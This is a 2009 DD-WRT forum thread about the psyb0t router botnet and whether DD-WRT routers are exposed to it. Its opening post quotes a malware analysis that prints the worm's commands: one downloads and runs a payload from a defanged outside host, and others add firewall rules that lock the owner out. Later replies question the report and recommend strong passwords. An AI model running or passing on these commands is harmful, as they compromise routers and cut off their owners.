Question on which versions are exploitable by psyb0t?

Post new topic   Reply to topic    DD-WRT Forum Index -> Broadcom SoC based Hardware
Goto page 1, 2  Next
Author Message
rjr162
DD-WRT User


Joined: 07 Jun 2006
Posts: 63

PostPosted: Tue Mar 24, 2009 1:14    Post subject: Question on which versions are exploitable by psyb0t? Reply with quote
"Network Bluepill - stealth router-based botnet has been DDoSing dronebl for the last couple of weeks

We have come across a botnet worm spreading around called "psyb0t". It is notable because, according to my knowledge, it:

* is the first botnet worm to target routers and DSL modems
* contains shellcode for many mipsel devices
* is not targeting PCs or servers
* uses multiple strategies for exploitation, including bruteforce username and password combinations
* harvests usernames and passwords through deep packet inspection
* can scan for exploitable phpMyAdmin and MySQL servers

Vulnerable devices

* any linux mipsel routing device that has the router administration interface or sshd or telnetd in a DMZ, which has weak username/passwords (including openwrt/dd-wrt devices).
* possibly others

Infection strategy

Get a shell on the vulnerable device (methods vary). Once a shell is acquired, the bot does the following things:

# rm -f /var/tmp/udhcpc.env
# wget

If wget is present, then it uses wget to download hxxp://dweb.webhop.net/.bb/udhcpc.env , and runs it in the background.

If wget is not present, the bot looks for "busybox ftpget", and then tries falling back to a tftp client. Once it is downloaded, it launches it in the background. The following snippet is the variant it uses if it finds that wget is usable.

# wget hxxp://dweb.webhop.net/.bb/udhcpc.env -P /var/tmp && chmod +x /var/tmp/udhcpc.env && /var/tmp/udhcpc.env &
udhcpc.env 100% |*****************************| 33744 00:00 ETA

It then takes several steps to lock anybody out of the device, including blocking telnet, sshd and web ports.

# iptables -A INPUT -p tcp --dport 23 -j DROP
# iptables -A INPUT -p tcp --dport 22 -j DROP
# iptables -A INPUT -p tcp --dport 80 -j DROP

This concludes the infection process."

Above taken from http://dronebl.org/blog/8

Are any versions less susceptible to this Botnet worm? I remotely manage DD-WRT flashed routers on different networks I have at different locations, and would hate to lose that ability. Would it be possible to have an option near the Enable/Disable SSH to change the port number in the GUI? It would at least make it a bit harder to find as you could hide it say as a SSL port (443) or something. I know you can change the default WebGUI port, which mine already are, but a quick and simple way to change the SSH port would be fantastic as a quick solution to help against this worm.
Sponsor
phuzi0n
DD-WRT Guru


Joined: 10 Oct 2006
Posts: 10141

PostPosted: Tue Mar 24, 2009 1:24    Post subject: Reply with quote
You can change the username and use a strong password. I doubt that there's really 80,000 people using custom firmwares that all configured remote access with weak login info. They don't really explain the rest of their claims. I have a feeling what really happened is a vendor left their routers open for remote access using default login info.
the_wanderer
DD-WRT Novice


Joined: 25 Aug 2006
Posts: 31

PostPosted: Tue Mar 24, 2009 5:10    Post subject: This whole thing stinks... Reply with quote
After looking at the binary, something's fishy. I do think that there is an worm, but I don't think that there could be anywhere near 80K DD-WRT/OpenWRT/Tomato/Whatever MIPS based routers that have weak passwords AND remote access turned on. DD-WRT goes NUTS if you try and leave the default passwords on while turning on remote admin, and it's been that way for a while.

Something else that's weird. The DroneBL guys are claiming that it's UPX packed, but, after looking at the binary, it's just a normal MIPS binary, I don't see any real packing.

What it looks like is that *IF* you're an idiot, and *IF* you leave the default passwords on your router, and *IF* you turn on remote admin on a DD-WRT/OpenWRT/Tomato router, THEN you might have a problem..

What is also possible is that there is somebody out there using a modified embedded linux in some other device that is, by default, enabling either remote telnet or remote ssh, or remote web administration. Something like that wouldn't surprise me at.. (Ask me about the "VPN Appliance" that would forward either TCP or UDP on a port, but not both...)

I'm taking a "Wait and see" stance. I think that when all the smoke clears, there will be VERY, VERY few dd-wrt and open-wrt boxes infected.
the_wanderer
DD-WRT Novice


Joined: 25 Aug 2006
Posts: 31

PostPosted: Tue Mar 24, 2009 6:30    Post subject: More info Reply with quote
I intentionally infected a router with the worm. At this point in time, the DNS for the control channel server (strcpy.us.to) doesn't resolve, so even if you are a "new infection", you can't join the control channel (which doesn't appear to be giving out any orders, anyway...) however, it appears that the control channel is still up and can be joined.

Also the bit about "It then takes several steps to lock anybody out of the device, including blocking telnet, sshd and web ports.

# iptables -A INPUT -p tcp --dport 23 -j DROP
# iptables -A INPUT -p tcp --dport 22 -j DROP
# iptables -A INPUT -p tcp --dport 80 -j DROP

This concludes the infection process." doesn't appear to be right..

Even after I infected my router, I was able to ssh, telnet, and get into the web interface.

After starting the udhcpd.env process, it creates a zero length file called udhcpd.mtx file in the /var/tmp directory. Udhcpd.env is still a running process and can be viewed by ps, and can be killed.

It's cute. Until somebody shows me remotely exploitable mips shellcode, tho, I'm putting this in the "not much of a threat" category.
ackray
DD-WRT User


Joined: 11 Mar 2009
Posts: 189

PostPosted: Tue Mar 24, 2009 7:02    Post subject: Re: This whole thing stinks... Reply with quote
the_wanderer wrote:

What is also possible is that there is somebody out there using a modified embedded linux in some other device that is, by default, enabling either remote telnet or remote ssh, or remote web administration. Something like that wouldn't surprise me at.. (Ask me about the "VPN Appliance" that would forward either TCP or UDP on a port, but not both...)

I'm taking a "Wait and see" stance. I think that when all the smoke clears, there will be VERY, VERY few dd-wrt and open-wrt boxes infected.


I'm guessing it is probably some kind of set top box or a multimedia device where security was an afterthought.
hajj_3
DD-WRT User


Joined: 01 Oct 2006
Posts: 58

PostPosted: Tue Mar 24, 2009 13:10    Post subject: Reply with quote
hope you guys can create a patched dd-wrt v24 sp1 within the next few days to fix the flaws in the firmwares:)
soulstace
DD-WRT Guru


Joined: 04 Aug 2007
Posts: 6427

PostPosted: Tue Mar 24, 2009 13:30    Post subject: Reply with quote
hajj_3 wrote:
hope you guys can create a patched dd-wrt v24 sp1 within the next few days to fix the flaws in the firmwares:)


"You can't fix stupid"

the_wanderer wrote:
What it looks like is that *IF* you're an idiot, and *IF* you leave the default passwords on your router, and *IF* you turn on remote admin on a DD-WRT/OpenWRT/Tomato router, THEN you might have a problem..
barryware
DD-WRT Guru


Joined: 26 Jan 2008
Posts: 13049
Location: Behind The Reset Button

PostPosted: Tue Mar 24, 2009 13:33    Post subject: Reply with quote
soulstace wrote:
hajj_3 wrote:
hope you guys can create a patched dd-wrt v24 sp1 within the next few days to fix the flaws in the firmwares:)


"You can't fix stupid"

the_wanderer wrote:
What it looks like is that *IF* you're an idiot, and *IF* you leave the default passwords on your router, and *IF* you turn on remote admin on a DD-WRT/OpenWRT/Tomato router, THEN you might have a problem..


Razz

_________________
[Moderator Deleted] Shocked
LOM
DD-WRT Guru


Joined: 28 Dec 2008
Posts: 7647

PostPosted: Tue Mar 24, 2009 13:34    Post subject: Reply with quote
hajj_3 wrote:
hope you guys can create a patched dd-wrt v24 sp1 within the next few days to fix the flaws in the firmwares:)


If something should be done to V24 sp1, then that is pulling it off the download section. Rolling Eyes
flypaper
DD-WRT User


Joined: 28 Nov 2007
Posts: 84

PostPosted: Tue Mar 24, 2009 13:44    Post subject: Re: This whole thing stinks... Reply with quote
the_wanderer wrote:
After looking at the binary, something's fishy. I do think that there is an worm, but I don't think that there could be anywhere near 80K DD-WRT/OpenWRT/Tomato/Whatever MIPS based routers that have weak passwords AND remote access turned on. DD-WRT goes NUTS if you try and leave the default passwords on while turning on remote admin, and it's been that way for a while.

Something else that's weird. The DroneBL guys are claiming that it's UPX packed, but, after looking at the binary, it's just a normal MIPS binary, I don't see any real packing.

What it looks like is that *IF* you're an idiot, and *IF* you leave the default passwords on your router, and *IF* you turn on remote admin on a DD-WRT/OpenWRT/Tomato router, THEN you might have a problem..

What is also possible is that there is somebody out there using a modified embedded linux in some other device that is, by default, enabling either remote telnet or remote ssh, or remote web administration. Something like that wouldn't surprise me at.. (Ask me about the "VPN Appliance" that would forward either TCP or UDP on a port, but not both...)

I'm taking a "Wait and see" stance. I think that when all the smoke clears, there will be VERY, VERY few dd-wrt and open-wrt boxes infected.


Did I miss somewhere where it said that ALL 80-100k were DD-WRT? And read the update about UPX packing...
marcmerlin
DD-WRT Novice


Joined: 20 Apr 2008
Posts: 43

PostPosted: Tue Mar 24, 2009 14:06    Post subject: Reply with quote
LOM wrote:
hajj_3 wrote:
hope you guys can create a patched dd-wrt v24 sp1 within the next few days to fix the flaws in the firmwares:)


If something should be done to V24 sp1, then that is pulling it off the download section. Rolling Eyes


Patched against what? Read this thread again before replying, so far there is no evidence that anything is wrong with dd-wrt, that any fix is needed, or that pulling it off the download section is necessary.

It's just a news article low on details, and potentially partially incorrect.

Marc
freonchill
DD-WRT Guru


Joined: 17 Jul 2006
Posts: 2055

PostPosted: Tue Mar 24, 2009 14:13    Post subject: Reply with quote
unless you want them to make it to ignore the commands 'to drop all http,ssh,telnet'

pretty much just make a STRONG password
e.g. username isnt default (8+ characters)
password has alpha,numeric,and characters if accepted (8+ characters)

perhaps use https://www.grc.com/passwords.htm

PS: dont know the dd-wrt max username and password length, so please test before doing remotely.

_________________
2x WRT54G v5, 2x WRT54G v2
1x WRT54G-TM
1x WRT54GL
1x WRT54G2 v1
2x BUFFALO WHR-G54S
2x BUFFALO WHR-G300N v2
1x BUFFLOW WHR-HP-G300N
1x La Fonera
FON Client Bridge tutorial
the_wanderer
DD-WRT Novice


Joined: 25 Aug 2006
Posts: 31

PostPosted: Tue Mar 24, 2009 14:19    Post subject: Something's still not adding up... Reply with quote
They've updated the info on the webpage, and included this statement:

"* Your username and password combinations are weak, OR the daemons that your firmware uses are exploitable.

As such, 90% of the routers and modems participating in this botnet are participating due to user-error (the user themselves or otherwise). Unfortunately, it seems that some of the people covering this botnet do not understand this point, and it is making us look like a bunch of idiots."

They're saying they've got mips shellcode, but they're not saying for what service. So until this little piece of info comes out, just wait and see.

Personally, it still has not been proved to me that it's not a "Don't leave the default passwords on your crap then turn on remote admin" problem.", which is security 101.
the_wanderer
DD-WRT Novice


Joined: 25 Aug 2006
Posts: 31

PostPosted: Tue Mar 24, 2009 14:24    Post subject: While I can't prove it... Reply with quote
I have a strange feeling that most of the infected devices are DLink DSL modems of some variant.
LOM
DD-WRT Guru


Joined: 28 Dec 2008
Posts: 7647

PostPosted: Tue Mar 24, 2009 14:49    Post subject: Reply with quote
marcmerlin wrote:
LOM wrote:
hajj_3 wrote:
hope you guys can create a patched dd-wrt v24 sp1 within the next few days to fix the flaws in the firmwares:)


If something should be done to V24 sp1, then that is pulling it off the download section. Rolling Eyes


Patched against what? Read this thread again before replying, so far there is no evidence that anything is wrong with dd-wrt, that any fix is needed, or that pulling it off the download section is necessary.

It's just a news article low on details, and potentially partially incorrect.

Marc


I know.
I think the V24 sp1 should be pulled for other reasons, almost half of all user problems are due to that buggy version.
Goto page 1, 2  Next Display posts from previous:    Page 1 of 2
Post new topic   Reply to topic    DD-WRT Forum Index -> Broadcom SoC based Hardware All times are GMT

Navigation

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum